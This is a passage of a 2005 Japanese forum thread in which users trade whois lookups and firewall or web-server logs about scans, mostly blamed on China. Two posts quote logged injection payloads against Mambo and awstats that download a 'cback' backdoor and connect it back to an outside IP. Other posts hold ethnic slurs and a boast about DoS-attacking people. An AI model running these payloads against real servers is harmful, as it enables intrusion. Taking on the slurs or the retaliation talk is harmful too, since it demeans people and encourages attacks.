183名無しさん@お腹いっぱい。:2005/12/10(土) 00:23:11
IPアドレス 210.154.213.213
ホスト名 p2213-ipbf201kanazawa.ishikawa.ocn.ne.jp
IPネットワークアドレス 210.154.192.0/18
ネットワーク名 OCN
組織名 オープンコンピュータネットワーク
[Organization]Open Computer Network
[管理者連絡窓口]AY1361JP
[技術連絡担当者]MO081JP
[技術連絡担当者]KK551JP
[技術連絡担当者]IM657JP
[割当年月日]1997/08/07
[返却年月日]
[最終更新]2002/01/28 10:48:43(JST)

三日以上昼夜を問わず突っ込んでくる。
此処まで異常なアクセス要求を連日出していても
管理者は気付かないのか?
IPは変われども、数ヶ月前からウィルスにやられた
同じヤツだと思うのだが・・・
マジで苦情出そうかなあ・・・
184名無しさん@お腹いっぱい。:2005/12/10(土) 03:05:30
最近 中国からばっか。なんとかなんない?
inetnum: 219.128.0.0 - 219.153.255.255
netname: CHINANET-CN
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET
status: ALLOCATED PORTABLE
changed: [email protected] 20050120
source: APNIC

inetnum: 219.128.0.0 - 219.137.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020424
changed: [email protected] 20041207
source: APNIC

% APNIC database, last updated 20050925 23:00:32
185名無しさん@お腹いっぱい。:2005/12/10(土) 13:01:41
inetnum: 218.13.0.0 - 218.20.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: APNIC-HM
mnt-by: MAINT-CHINANET
status: ALLOCATED PORTABLE
changed: [email protected] 20050511
source: APNIC

inetnum: 218.13.0.0 - 218.18.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20010528
changed: [email protected] 20041207
source: APNIC
186名無しさん@お腹いっぱい。:2005/12/10(土) 13:05:16
OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 224.0.0.0 - 239.255.255.255
CIDR: 224.0.0.0/4
NetName: MCAST-NET
NetHandle: NET-224-0-0-0-1
Parent:
NetType: IANA Special Use
NameServer: FLAG.EP.NET
NameServer: STRUL.STUPI.SE
NameServer: NS.ISI.EDU
NameServer: NIC.NEAR.NET
Comment: This block is reserved for special purposes.
Comment: Please see RFC 3171 for additional information.
Comment:
RegDate: 1991-05-22
Updated: 2002-09-16
187名無しさん@お腹いっぱい。:2005/12/10(土) 15:26:33
inetnum: 220.189.228.144 - 220.189.228.151
netname: SHANGYU-XIAOYUE-HIGH-SCHOOL
country: CN   → (中国)
descr: Shangyu Xiaoyue High School

status: ASSIGNED NON-PORTABLE
changed: [email protected] 20050429

role: CHINANET-ZJ Shaoxing
address: No.9 Sima Road,Shaoxing,Zhejiang.312000
country: CN   → (中国)
phone: +86-575-5136199
fax-no: +86-575-5114449
admin-c: CH109-AP
tech-c: CH109-AP
nic-hdl: CS64-AP
mnt-by: MAINT-CHINANET-ZJ
changed: [email protected] 20031204
source: APNIC

person: Huafu Zhe
nic-hdl: HZ395-AP
e-mail: [email protected]
address: Xiaoyue High School,Shangyu,Shaoxing,Zhejiang.Postcode:312300
phone: +86-575-2117535
country: CN   → (中国)
changed: [email protected] 20050421
mnt-by: MAINT-CN-CHINANET-ZJ-SX
source: APNIC

188名無しさん@お腹いっぱい。:2005/12/10(土) 15:32:10
今日は中国からハッキングが多いんだがなぜだ
inetnum: 203.175.192.0 - 203.175.255.255
netname: NBIP
descr: NBIP CNC(Ningbo)info-Port co.,Ltd
country: CN
admin-c: CJ118-AP
tech-c: CJ118-AP
status: ALLOCATED PORTABLE
changed: [email protected] 20021128
mnt-by: APNIC-HM
mnt-lower: MAINT-CN-NBIP
source: APNIC
189名無しさん@お腹いっぱい。:2005/12/10(土) 15:38:13
ここ2,3日シナから多い
219.234.184.221
202.98.201.75
218.64.68.56
190名無しさん@お腹いっぱい。:2005/12/10(土) 15:39:43
191名無しさん@お腹いっぱい。:2005/12/10(土) 15:49:18
role: CHINANET HUNAN
address: No.1 TuanJie road,ChangSha,Hunan 410005
country: CN   → (中国)
phone: +86 731 4792092
fax-no: +86 731 4792007
e-mail: [email protected]
trouble: send spam reports to [email protected]
trouble: and abuse reports to [email protected]
trouble: Please include detailed information and
trouble: times in UTC
admin-c: CH632-AP
tech-c: CS499-AP
nic-hdl: CH636-AP
mnt-by: MAINT-CHINANET-HN
changed: [email protected] 20050816
source: APNIC
192名無しさん@お腹いっぱい。:2005/12/10(土) 15:55:39
inetnum: 222.32.0.0 - 222.63.255.255
descr: CHINA RAILWAY TELECOMMUNICATIONS
netname: CRTC
person: LV QIANG
nic-hdl: LQ112-AP
e-mail: [email protected]
address: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.China
phone: +86-10-51892106
fax-no: +86-10-51890674
country: CN   → (中国)
changed: [email protected] 20050823
mnt-by: MAINT-CNNIC-AP
source: APNIC
193名無しさん@お腹いっぱい。:2005/12/10(土) 17:13:20
inetnum: 61.157.0.0 - 61.157.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: Data Communication Division
descr: China Telecom
country: シナ
admin-c: CH93-AP
tech-c: XS16-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-SC
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20000701
changed: [email protected] 20040927
changed: [email protected] 20041126
source: APNIC

% APNIC database, last updated 20050925 23:00:32

194名無しさん@お腹いっぱい。:2005/12/10(土) 17:16:06
inetnum: 219.234.184.0 - 219.234.184.255
netname: YI-GUO-ZAI-XIAN
country: シナ
descr: BEIJING YI-GUO-ZAI-XIAN CO.LTD
descr: CO.LTD
admin-c: PP40-AP
tech-c: PP40-AP
status: ASSIGNED NON-PORTABLE
changed: [email protected] 20030211
mnt-by: MAINT-CNNIC-AP
source: APNIC
195名無しさん@お腹いっぱい。:2005/12/10(土) 19:49:19
やたらと中国から攻撃される
何かあったの?
196名無しさん@お腹いっぱい。:2005/12/10(土) 20:21:19
中国方面からUDP:1026...1030あたりを激しくハァハァされてる。
同じIPから何度も何度も。
197名無しさん@お腹いっぱい。:2005/12/10(土) 20:28:47
中国多発。
今のノートンはピコピコじゃないからうざい。
198名無しさん@お腹いっぱい。:2005/12/10(土) 21:01:12
239.255.255.250

米の国か
しつこいな
199名無しさん@お腹いっぱい。:2005/12/10(土) 21:10:48
・・・と思ったら違った!!
200名無しさん@お腹いっぱい。:2005/12/10(土) 21:42:46
中国ウザすぎ。
201名無しさん@お腹いっぱい。:2005/12/10(土) 21:47:42
NTV板に入ろうとすると206.223.150.96からHTTP MSIE JaveScript OnLoad RteCodeExec
で攻撃されるんだがこれってウイルスが俺のパソコンに入っているの?
202名無しさん@お腹いっぱい。:2005/12/10(土) 22:03:30
今日中国にIP別々で10回もハッキングされているんだけどなんかあったのか
inetnum: 218.87.0.0 - 218.87.255.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
source: APNIC

% APNIC database, last updated 20050925 23:00:32
文字を書き込んでいる途中にも218.87.65.83からもハッキングされた
203名無しさん@お腹いっぱい。:2005/12/10(土) 22:13:22
中国から攻撃を受けているのが俺だけじゃなくてちょっと安心
204名無しさん@お腹いっぱい。:2005/12/10(土) 22:26:43
IPアドレス 222.2.147.66
ホスト名 ZG147066.ppp.dion.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 愛知県
市外局番 --
接続回線 xDSL
205名無しさん@お腹いっぱい。:2005/12/10(土) 23:34:09
今は数分おきに攻撃があるぞw
基地外中国人は何がしたいんだ?
206名無しさん@お腹いっぱい。:2005/12/10(土) 23:42:01
ぜんぜん来ないよ・・・
さびしいよ・・・
207名無しさん@お腹いっぱい。:2005/12/10(土) 23:51:19
昨日からずーっと中国から1025攻撃されてる
キリがない
208名無しさん@お腹いっぱい。:2005/12/11(日) 00:33:14
パールハーバーのノリかな?
209名無しさん@お腹いっぱい。:2005/12/11(日) 00:54:31
最近はK察も不正アクセスに対してアナウンスするようになったのね

警察庁は9日、主に中国の不特定のIPアドレスを発信元とする、
TCP 1025番ポートに対するアクセスの増加を検知したとして、注意喚起を行なった。
TCP 1025番ポートへのアクセスは8日の21時頃から急増し、9日現在もアクセスが続いている。
アクセス増加の原因については現在のところ不明だが、このポートはWindowsのRPC DCOMなどで利用されるもので、
大規模なスキャンの可能性があるという。警察庁では、修正プログラムの適用を行なうなど、
使用しているコンピュータのセキュリティの再確認を推奨している。

http://internet.watch.impress.co.jp/cda/news/2005/12/09/10174.html
210名無しさん@お腹いっぱい。:2005/12/11(日) 00:54:58
今、中国から来ました
218.64.69.85
211名無しさん@お腹いっぱい。:2005/12/11(日) 02:55:23
数分おきにチャイナから攻撃されてウザッたいなぁ
212名無しさん@お腹いっぱい。:2005/12/11(日) 05:28:00
そうえいば2CHにセキュリティ板あったなあと思って来てみたら・・・。
みんなここ最近中華から攻撃されてるのか。俺も数分おきくらいにノートン先生が反応する
213名無しさん@お腹いっぱい。:2005/12/11(日) 06:07:28
いや〜
もうかれこれ40回は攻撃されちゃってるよぅ、チャイナから
なに今度はネットで反日活動?活動と言うか攻撃?
214名無しさん@お腹いっぱい。:2005/12/11(日) 08:55:43
5EX
215名無しさん@お腹いっぱい。:2005/12/11(日) 09:56:38
チャイナギャルに攻撃されたい
216名無しさん@お腹いっぱい。:2005/12/11(日) 10:02:04
>>209
それ見つけてルータのログ見たら1025アクセスがさっそく見つかってワロタ
217名無しさん@お腹いっぱい。:2005/12/11(日) 10:52:17
>>209
俺も調べたら中国から
1025-1030のアクセスがあった。
218名無しさん@お腹いっぱい。:2005/12/11(日) 11:03:35
チョンやチャンコロのためにログ領域消費するのは無駄。つーか、ログが穢れる。
チョンとチャンコロはルールの最初で無条件に落としといて、回数だけカウント。
219名無しさん@お腹いっぱい。:2005/12/11(日) 12:28:49
攻撃があるとかアクセスがあるとか、どうやってわかるの?
220名無しさん@お腹いっぱい。:2005/12/11(日) 16:17:04
218.5.18.93
チャンコロむかつく
221名無しさん@お腹いっぱい。:2005/12/11(日) 18:57:17
>>220
俺もそいつから今攻撃された
昨日から中国の攻撃がすごい多い
222名無しさん@お腹いっぱい。:2005/12/11(日) 19:21:51

223ウザス:2005/12/11(日) 19:31:02
2005/12/11(14:56:56) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /thisdoesnotexistahaha.php HTTP/1.1" ( dummy )
2005/12/11(14:56:57) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:58) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /file/trunk/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:58) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /log/trunk/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:59) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /trunk/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:59) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /wordpress/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:00) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:01) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /drupal/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:01) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:02) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:02) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /blog/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:03) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /community/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:04) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /blogs/xmlrpc.php HTTP/1.1" ( dummy )
                               (中略)
2005/12/11(14:57:11) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /pavon/xmlrpc.php HTTP/1.1" ( dummy )
224名無しさん@お腹いっぱい。:2005/12/11(日) 21:51:08
中国何回攻撃してくるんだ
inetnum: 218.64.0.0 - 218.65.127.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
changed: [email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
status: ALLOCATED NON-PORTABLE
source: APNIC

inetnum: 218.64.0.0 - 218.95.255.255
netname: CHINANET-CN
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET
changed: [email protected] 20010628
status: ALLOCATED PORTABLE
source: APNIC
225名無しさん@お腹いっぱい。:2005/12/11(日) 22:10:15
氏ね
inetnum: 218.87.0.0 - 218.87.255.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
source: APNIC
226名無しさん@お腹いっぱい。:2005/12/11(日) 22:22:59
inetnum: 211.90.0.0 - 211.97.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: UCH1-AP
tech-c: UCH1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CN-CNNIC-UNICOM
status: ALLOCATED PORTABLE
changed: [email protected] 20041203
source: APNIC

inetnum: 211.94.0.0 - 211.103.255.255
netname: CNNIC
descr: China Internet Network Information Center
country: CN
admin-c: HQ1-CN
tech-c: MW1-AP
tech-c: WZ2-AP
remarks: confederation CNNIC
mnt-by: MAINT-CNNIC-AP
changed: [email protected] 19991214
status: ALLOCATED PORTABLE
source: APNIC
227名無しさん@お腹いっぱい。:2005/12/11(日) 22:35:24
22102 へのアクセスがハゲシス
228名無しさん@お腹いっぱい。:2005/12/11(日) 22:47:42
中国だから警察にいっても捕まらないんだよな
229名無しさん@お腹いっぱい。:2005/12/11(日) 23:01:17
22時40分に 218.87.160.151(まあ支那だけど・・・) からの攻撃をブロックしたって表示が出てるんだけど、
ブロックされれば安全ってこと?
230名無しさん@お腹いっぱい。:2005/12/12(月) 00:06:09
IPアドレス 211.155.224.254
ホスト名 mail2.srt.com.cn
IPアドレス
 割当国 ※ 中国 (CN)

昨日から攻撃すごいんですけど
どうにかなりませんか?
231名無しさん@お腹いっぱい。:2005/12/12(月) 01:09:59
221.138.69.58から来るんだけど・・・。
一応韓国で住所までわかるんだが・・・。
232名無しさん@お腹いっぱい。:2005/12/12(月) 07:37:46
夜に中国からの攻撃が20回ほどあったんだがなんでいままであんまり攻撃してこなかったのに急にたくさん
攻撃してくるんだろ
233名無しさん@お腹いっぱい。:2005/12/12(月) 09:17:08
昨日の夜に1026使ってインドネシアから攻撃が来たな
珍しい?
234名無しさん@お腹いっぱい。:2005/12/12(月) 10:10:32
133.205.161.195
ホスト名 FLH1Aan195.chb.mesh.ad.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 光

さっきから何度も何度も連続で攻撃してきやがって。うぜぇ氏ね
235名無しさん@お腹いっぱい。:2005/12/12(月) 10:35:31
>>229
ブロックしてないのにブロックしたよって言っていなければ安全
236名無しさん@お腹いっぱい。:2005/12/12(月) 18:15:11
>>233
俺はベトナムからきたぞ
237名無しさん@お腹いっぱい。:2005/12/13(火) 02:37:21
不正アクセスされるとどうなるの
238名無しさん@お腹いっぱい。:2005/12/13(火) 04:07:27
ウゼー
www.mutoh.co.jp


武藤工業って会社が中国の中継
仕事の調べモノできねーじゃん

239名無しさん@お腹いっぱい。:2005/12/13(火) 10:03:24
2005/12/13(02:42:47) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:49) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:50) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:51) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http//209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(02:42:52) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(02:42:54) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(02:42:55) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(02:42:56) W-SV ebweb.sirvisetti.com(209.250.116.251) [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy )

途中で改行してあるがこれはひどい。
240名無しさん@お腹いっぱい。:2005/12/13(火) 13:33:05
>>209
1025ポートはApplication Layer Gateway Serviceだと思うんだけど、
過去にセキュリティホールなんてあったっけ?
ファイルバージョン:5.1.2600.2180
241名無しさん@お腹いっぱい。:2005/12/13(火) 14:16:44
ttp://www.mcafee.com/japan/security/virN2003.asp?v=Naldem
こんなのしかヒットしないんだな
感染マシンでも探しているんだろうけどな
2421/2:2005/12/13(火) 15:15:02
2005/12/13(15:09:34) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod
%20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(15:09:36) W-SV ftp1.nickonline.com(166.77.41.116) [80] 302 29 "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod
%20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(15:09:37) W-SV ftp1.nickonline.com(166.77.41.116) [80] 302 29 "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20130%2e149%2e203%2e250%2fcback%3bchmod
%20%2bx%20cback%3b%2e%2fcback%2062%2e123%2e107%2e49%208081;echo%20YYY;echo| HTTP/1.1" ( dummy )
2005/12/13(15:09:38) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:39) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blog/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:40) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:41) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:43) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /drupal/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:44) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:45) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:46) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:47) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/13(15:09:48) W-SV ftp1.nickonline.com(166.77.41.116) [80] 404 0 "POST /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
244名無しさん@お腹いっぱい。:2005/12/13(火) 16:33:28
httpサーバーからセットでアクセスされているおまえ
ウザいから書き込むな!
245名無しさん@お腹いっぱい。:2005/12/13(火) 20:22:07
あなたが検索されたアドレス[ 221.188.211.53 ]のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 221.188.0.0/16
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
[割当年月日] 2003/08/27
[最終更新] 2003/08/27 12:52:01(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 221.184.0.0/13
246名無しさん@お腹いっぱい。:2005/12/13(火) 22:25:55
昨日は中国からアクセスすごかったのに今日はなんで少なくなったんだ
247名無しさん@お腹いっぱい。:2005/12/13(火) 23:47:41
さっきルータ繋ぎなおしてあるIPになったとたん、複数の色んなとこから
ポート
61880
17020
にどーーーーーーーーーーーーーーーーーーーーーっと
いっせいにアクセスされたんだけどこれって何ナノ?(;・∀・)
248名無しさん@お腹いっぱい。:2005/12/13(火) 23:54:00
>>244
WinでBJD使ってる素人だから無理だろ
249名無しさん@お腹いっぱい。:2005/12/14(水) 00:02:46
>>245
みたいな結果って
OCNのプロバイダ利用している動的IPのPCからって事ですか?
250名無しさん@お腹いっぱい。:2005/12/14(水) 00:05:15
俺ゃ、ファイアーウォールの不正アクセスログなど一切気にしません。
ふざけたやつを見つけた時だけ一時間はDOS攻撃をしてやります。
251名無しさん@お腹いっぱい。:2005/12/14(水) 00:22:37
61.14.156.68
とにかくシツコイが罠を仕掛けるとぱったりw
252名無しさん@お腹いっぱい。:2005/12/14(水) 00:26:43
61.14.156.70
またきたwwwwなにこれwwww
253名無しさん@お腹いっぱい。:2005/12/14(水) 00:34:50
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 61.14.128.0 - 61.14.191.255
netname: ANC-NETBLK04
descr: Asia Netcom Corporation
descr: Internet Service Provider
country: AP
admin-c: AN155-AP
tech-c: AN155-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-AP-ANC

e-mail: [email protected]
-------------------------------------------------------------------------------
訳ワカラン
254名無しさん@お腹いっぱい。:2005/12/14(水) 01:47:19
61.14.156.69
ここヤバイの???
255名無しさん@お腹いっぱい。:2005/12/14(水) 02:59:59
220.248.201.2
219.154.96.7
中国(CN)
ポート1025を攻めてきやがった。

別件で135攻められてるのってブラスタ?
256名無しさん@お腹いっぱい。:2005/12/14(水) 03:02:55
220.148.188.60

掲示板へSPAM書き込み連打。
ぐぐるとわかるけど他の掲示板も被害にあってるっぽい。
どうでもいいけど、SMTPとPOP3が開いてますよ^^
257名無しさん@お腹いっぱい。:2005/12/14(水) 08:46:58
すごいのきた。こっちは開いてるように見せかけてるサーバだから大丈夫だけどね。
sshd:
Authentication Failures:
unknown (jinzai.yqa.co.jp): 2928 Time(s)
bin (jinzai.yqa.co.jp): 1 Time(s)
Invalid Users:
Unknown Account: 2928 Time(s)
258名無しさん@お腹いっぱい。:2005/12/14(水) 08:57:33
>>257
これ、PROXで運営されている(おそらく専用)サーバなんだが、
PROXのは管理がいい加減なサーバが多いね。
rootもらってるはずだから利用者側にも問題あるし、
そもそも穴だらけと思われるデフォルト設定をしているPROXもどうかと。
以下、一部抜粋。

$ dig jinzai.yqa.co.jp
;; ANSWER SECTION:
jinzai.yqa.co.jp. 85543 IN A 210.143.109.198


$ dig -x 210.143.109.198
;; ANSWER SECTION:
198.109.143.210.in-addr.arpa. 85955 IN PTR jinzai.yqa.co.jp.

;; AUTHORITY SECTION:
109.143.210.in-addr.arpa. 70772 IN NS dns1.ixent.ne.jp.
109.143.210.in-addr.arpa. 70772 IN NS dns2.ixent.ne.jp.
259名無しさん@お腹いっぱい。:2005/12/14(水) 09:26:24
穴だらけならば落っこどしてやればいいじゃない
260名無しさん@お腹いっぱい。:2005/12/14(水) 12:58:49
攻撃?
そんなのウンコだ
261名無しさん@お腹いっぱい。:2005/12/14(水) 13:56:54
206.223.151.67
262名無しさん@お腹いっぱい。:2005/12/14(水) 16:06:54
81.21.214.70.117
トルコから

さっきはシナチクだった
263名無しさん@お腹いっぱい。:2005/12/14(水) 18:04:25
[09:29:50] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:51] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:52] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:53] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:54] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:55] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:56] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -
[09:29:57] <61.66.208.20> (0,0) [ヘッダー受信中に切断しました] - -

ようやく我が家にもそれらしきものが来たかと思ったが台湾だった…。
264名無しさん@お腹いっぱい。:2005/12/14(水) 18:35:13
厨のIP
220.220.235.175 61.199.8.217

265名無しさん@お腹いっぱい。:2005/12/14(水) 23:37:43
nthygo086018.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.212.18)
266名無しさん@お腹いっぱい。:2005/12/15(木) 19:23:20
[19:16:21] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:22] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:24] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:27] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:28] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:30] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:31] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:32] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:33] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:37] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:38] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
[19:16:39] <59.188.7.11> (0,0) [ヘッダー受信中に切断しました] - -
